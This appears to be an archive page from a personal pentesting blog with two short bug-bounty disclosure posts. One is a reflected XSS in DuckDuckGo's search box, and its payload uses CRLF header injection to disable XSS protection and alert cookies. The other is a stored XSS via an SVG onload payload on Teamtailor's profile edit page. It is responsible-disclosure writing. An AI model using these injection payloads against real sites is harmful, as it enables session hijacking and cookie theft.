Pentest Space: September 2015

Sunday, 20 September 2015

Acknowledgement + SWAG by Duck Duck Go

Vulnerability: Reflected Cross Site Scripting XSS
Vuln function: Search box

Payload: ref:xxx:1%2F%0aX-XSS-Protection:0%0aContent-Type:text/html%0aContent-Length:39%0a%0a%3cscript%3ealert(document.cookie)%3c/script%3e%2F..%2F..%2F..%2F../tr

Got Acknowledgement + SWAG by Duck Duck Go for reporting security vulnerability. :)

Monday, 14 September 2015

Listed Security Hall of Fame at Teamtailor.

1) Vulnerability Name:

XSS: Cross Site Scripting Vulnerabilities

2) Vulnerability Point:

Inset video tag at User Profile edit page. ( https://www.teamtailor.com/profile/edit )

3) Payload:

"/><svg/onload=prompt("//XSS-By-Ye//")>

Hall of fame: https://resources.teamtailor.com/vulnerability

About Me

Ye Yint aka r0lan has always had a strong fascination with InfoSec. He is one bit of YEHG core team and also a former technical team member of mmCERT. He has participated in responsible disclosure programs and attained some Hall of Fames and CVEs. Currently, he has obtained OSCE, eCPTX, AWAE, OSCP, OSWP, CREST CRT and CPSA and has occasionally contributed back to the community such as BSides Myanmar and Myanmar Cyber Security Challenge CTF competition as one of the organisers.
Linkedin , Github , Twitter